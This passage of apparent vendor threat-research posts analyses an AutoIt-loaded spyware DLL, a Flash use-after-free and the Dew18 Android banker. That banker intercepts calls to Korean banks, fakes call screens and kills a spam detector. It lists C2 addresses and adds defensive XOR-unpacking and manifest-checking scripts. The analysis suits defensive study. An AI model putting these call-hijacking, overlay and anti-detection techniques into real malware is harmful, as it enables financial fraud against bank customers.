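        raise ValueError("no single-byte XOR key yields a ZIP header")
    plain = xor_bytes(blob, bytes([key]))
    with zipfile.ZipFile(io.BytesIO(plain)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def build_sample(key: int = 0x5A) -> bytes:
    """Constructed stand-in for the downloaded stage: a small ZIP (a fake AutoIt
    script plus the fake DLL it loads) XOR-ed with `key`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("loader.au3", 'DllCall("payload.dll", "none", "Run")\n')
        zf.writestr("payload.dll", b"MZ" + b"\x00" * 62 + b"fake dll body")
    return xor_bytes(buf.getvalue(), bytes([key]))


ENCRYPTED = build_sample()

if __name__ == "__main__":
    print("key: 0x%02x" % recover_key(ENCRYPTED))
    for name, data in extract_members(ENCRYPTED).items():
        print(name, len(data), "bytes")
```

For a longer repeating key the same idea still applies, but four bytes of known plaintext only pin down four key bytes; the rest of the local file header (version, flags, and the fixed-format fields that follow) has to supply the remaining known plaintext, which is why `xor_bytes` already accepts a multi-byte key.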

For persistence, a Run entry is added in the registry and a shortcut file is created in the Startup folder, as shown below:

The only purpose of the AutoIt script is to load and execute the malicious DLL file as shown below:

Upon analysis, the malicious DLL file is found to be spyware which uses anti-reversing and anti-VM techniques to hinder analysis. The spyware is capable of:

  1. Logging keystrokes
  2. Capturing screenshots
  3. Stealing system information
  4. Sending the stolen data to a remote server

Capture ATP report for this file:

 

Updated on 12/12/2018

We have noticed a change in the file name pattern as well as in the number of files carried by the archive, as shown below:

A recently received archive contains a clean Microsoft Installer in addition to a malicious batch file, as shown below:

 

At the time of analysis, the malicious batch file was not available in any of the popular threat intelligence sharing portals like VirusTotal and ReversingLabs:

The batch file is highly obfuscated as shown below:

The purpose of the batch file is to download and execute a malicious PowerShell script.

Flash Zero day CVE-2018-15982

Adobe Flash Player has a use-after-free vulnerability that allows arbitrary code execution. A malicious SWF file exploits this vulnerability to execute code on the victim’s computer. Adobe has patched this vulnerability.

The Adobe Flash Player plugin crashes when the malformed Flash file is run in a browser.

SonicWALL Capture Labs provides protection against this threat via following signatures:

IPS 5336 : Malformed-File swf.MP.598

GAV 9914 : CVE-2018-15982

Dew18 banker for Android targets Korean financial institutions

Bankers are among the most widespread threats in the Android malware landscape. Most of them target specific banks and steal login credentials, credit card numbers and other sensitive data from the infected device.

SonicWall Threats Research Team observed a campaign that has been spreading for the last few months and targeting Korean banks. We have named it the Dew18 campaign, since samples belonging to it have Dew18 in their package name.

The malware in this campaign can steal sensitive data such as call logs and SMS messages from the device, block the user from contacting the customer care lines of certain banks, and kill a particular spam detector app, preventing the user from being warned when a potential spam call arrives.

Infection Cycle: Application Installation & Execution

The malware requests the following permissions during installation:

  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.INTERNET
  • android.permission.READ_SMS
  • android.permission.READ_CONTACTS
  • android.permission.READ_CALL_LOG
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.WAKE_LOCK
  • android.permission.READ_PHONE_STATE
  • android.permission.CALL_PHONE
  • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission.WRITE_CALL_LOG
  • android.permission.READ_CONTACTS
  • android.permission.MODIFY_PHONE_STATE
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.KILL_BACKGROUND_PROCESSES
  • android.permission.BOOT_COMPLETED
  • android.permission.ACCESS_BACKGROUND_SERVICE
  • android.hardware.telephony
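A manifest check for the permission set requested above, as an added example rather than SonicWall’s signature: it groups the declared permissions by capability and flags the combination a call-intercepting banker needs (telephony, overlay, kill background processes, network), plus the Dew18 package-name prefix. Both manifests are constructed; the benign package name is a placeholder and the grouping is illustrative.

```python
"""Flag an AndroidManifest.xml that asks for the telephony-abuse permission set
the Dew18 samples request: read SMS, see and alter calls, draw over other apps,
kill other processes, reach the network. Added example, not SonicWall's
signature: the manifests are constructed and the grouping is illustrative."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions from the list above, grouped by what they let the app do.
GROUPS = {
    "sms": {"android.permission.READ_SMS"},
    "calls": {"android.permission.READ_CALL_LOG", "android.permission.WRITE_CALL_LOG",
              "android.permission.CALL_PHONE", "android.permission.PROCESS_OUTGOING_CALLS",
              "android.permission.MODIFY_PHONE_STATE"},
    "overlay": {"android.permission.SYSTEM_ALERT_WINDOW"},
    "kill_apps": {"android.permission.KILL_BACKGROUND_PROCESSES"},
    "network": {"android.permission.INTERNET"},
    "boot": {"android.permission.RECEIVE_BOOT_COMPLETED"},
}
# Seeing the call, faking the call UI, silencing a spam detector and phoning home
# is the combination this banker needs; each group alone is common in benign apps.
BANKER_PATTERN = {"calls", "overlay", "kill_apps", "network"}


def declared_permissions(manifest_xml: str) -> set:
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}


def package_name(manifest_xml: str) -> str:
    return ET.fromstring(manifest_xml).get("package", "")


def assess(manifest_xml: str) -> dict:
    perms = declared_permissions(manifest_xml)
    groups = {g for g, names in GROUPS.items() if perms & names}
    reasons = {
        "dew18_package": package_name(manifest_xml).startswith("com.example.dew18."),
        "banker_permissions": BANKER_PATTERN <= groups,
    }
    return {"package": package_name(manifest_xml), "groups": sorted(groups),
            "verdict": "suspicious" if any(reasons.values()) else "benign",
            "reasons": reasons}


def make_manifest(package: str, perms) -> str:
    """Constructed manifest text for the demo."""
    body = "".join('  <uses-permission android:name="%s"/>\n' % p for p in perms)
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            'package="%s">\n%s</manifest>\n' % (package, body))


DEW18_MANIFEST = make_manifest("com.example.dew18.a", [
    "android.permission.INTERNET", "android.permission.READ_SMS",
    "android.permission.READ_CALL_LOG", "android.permission.CALL_PHONE",
    "android.permission.PROCESS_OUTGOING_CALLS", "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.KILL_BACKGROUND_PROCESSES", "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_CONTACTS", "android.permission.READ_CONTACTS",  # duplicate, as in the sample
])
BENIGN_MANIFEST = make_manifest("com.example.weather", [   # placeholder package
    "android.permission.INTERNET", "android.permission.ACCESS_NETWORK_STATE",
])

if __name__ == "__main__":
    for m in (DEW18_MANIFEST, BENIGN_MANIFEST):
        print(assess(m))
```

Run it against the binary manifest only after decoding it (apktool or aapt dump); the parser here expects the plain-text XML form. The package-name rule is brittle by design and is only there because the page reports it; the permission combination is what carries over to the next rebrand.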

The majority of the malware belonging to this campaign uses an icon closely resembling other banking apps. One of the samples we analyzed uses the icon of the official Citibank finance app, as visible once it is installed:

 

Once installed and executed, we are shown the app’s main screen, which accepts user input to apply for a loan, along with a few other screens selectable from the top menu. None of the links or buttons on any page except the loan application page work; they are just static pages displayed in the app:

The loan application page accepts details from the user, and once the Apply button is clicked the user is told that the application has been submitted. There is no activity from the app indicating that any loan-related data is sent; this is shown only to make the user feel that the app is actually doing something:

 

Infection Cycle: Device related data

Once execution begins, the malware starts sending personal information from the infected device:

As visible above, the malware is mostly interested in the calls made and received from the device. The images below show different areas in the code where sensitive data from the device is accessed:

 

Infection Cycle: Outgoing calls and Phone numbers

The malware contains interesting code related to outgoing calls. It holds a list of customer care numbers belonging to certain Korean banks; if a number from this list is dialed, it loads a specific audio file from its assets folder and plays it, effectively blocking the user from contacting the bank. To the user it sounds as if the voice came from the bank representative they called, but in reality the call never went through.

The figure below shows a snippet of the phone numbers the malware monitors when an outgoing call is made, and a few audio files from the assets folder:

Based on the phone number dialed, an appropriate audio file is played to mimic a person answering the phone. The malware also displays a stock background image for incoming/outgoing calls to make things look authentic and believable (more on this later in the blog):

 

A quick search based on the hard-coded phone numbers and the file names of the audio files confirmed that they belong to the customer service lines of certain banks:

 

A rough translation of the audio from one of the audio files is as follows:

  • “Welcome to (name) corporation. Through our safe and convenient loan service we will take care of you.”

We observed code that replaces the outgoing phone number; during our analysis we saw console logs indicating this, but it was not reflected on the device used for the call. Considering that the malware plays a canned audio recording when a bank or financial institution’s number is dialed, it is possible that the malware replaces the number and connects the call to one of the attackers instead. The attacker can then pose as a real banker and request sensitive information such as bank account numbers, credit card numbers and other details, making this a clever scam.

Infection Cycle: Kill the spam detector

These days there are a number of useful apps that check an incoming number and notify the user if it is a potential spam call before the user answers. Such apps are useful enough that Google took notice of the feature and incorporated it into the OS.

One such Korean spam-detection app is WhoWho, which enjoys a large user base, as visible from its high ratings:

 

When a call is received on the infected device, this malware quietly kills the spam detector app WhoWho if it is installed, thereby helping the spammers:

Floating call windows

As mentioned earlier, when a call to a particular number is made from the infected device, the malware simulates a call by playing an audio file. To make things more convincing, the malware displays a stock outgoing-call background appropriate to the make of the phone; we observed code for the following phone manufacturers in the samples:

  • Samsung
  • LG
  • Pantech

All of the above manufacturers are based in South Korea, and phones from them are a popular choice among Korean users.

Below is a comparison of the real outgoing call background from a Samsung device, what happened when we made an outgoing call from an infected device, and the stock images saved by the malware in its resources folder:

The outgoing call background effect is achieved in Android using floating windows, essentially a small overlay drawn on top of the current view/activity (this is what the SYSTEM_ALERT_WINDOW permission requested above is for).

The Dew18 campaign

The earliest sample belonging to this campaign dates back to October 22, 2018, and the latest to today, December 5, 2018, which indicates a fairly new campaign.

Based on our observations, samples belonging to this campaign have one of the following package names:

  • com.example.dew18.myapplication
  • com.example.dew18.a

Most of the application names and icons belong to Korean financial institutions; a few are listed below:

  • KB Kookmin Bank
  • NH Capital
  • Hana financial group

The following are a few of the IP addresses contacted by different samples from this campaign during our analysis:

  • 45.120.69.4
  • 45.120.69.57
  • 112.219.131.74
  • 182.162.104.210
  • 182.162.104.245
  • 211.169.248.219
  • 211.169.248.246

We observed links to the following hard-coded PHP pages in every sample belonging to this campaign:

  • [server_ip]/InfoFromAPP.php – Information from the infected device is sent to this page
  • [server_ip]/upload_ok.php – We did not see network activity for this page during our analysis

Investigating this campaign and its IP addresses on VirusTotal revealed an interesting page:

  • [server_ip]/login.php

This page contains additional redirects:

  • If an ‘admin’ logs in – /adminpage.php
  • If a ‘user’ logs in – /sample1.php

At the time of writing, one of the servers is still serving a malicious APK belonging to this campaign at:

  • [server ip]/aaa.apk

This campaign may operate under a Malware-as-a-Service (MaaS) model: it has a fairly complete implementation for carrying out financial fraud, which makes it extremely attractive to scammers.

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • AndroidOS.Dew.BNK
  • AndroidOS.Dew.BNK_2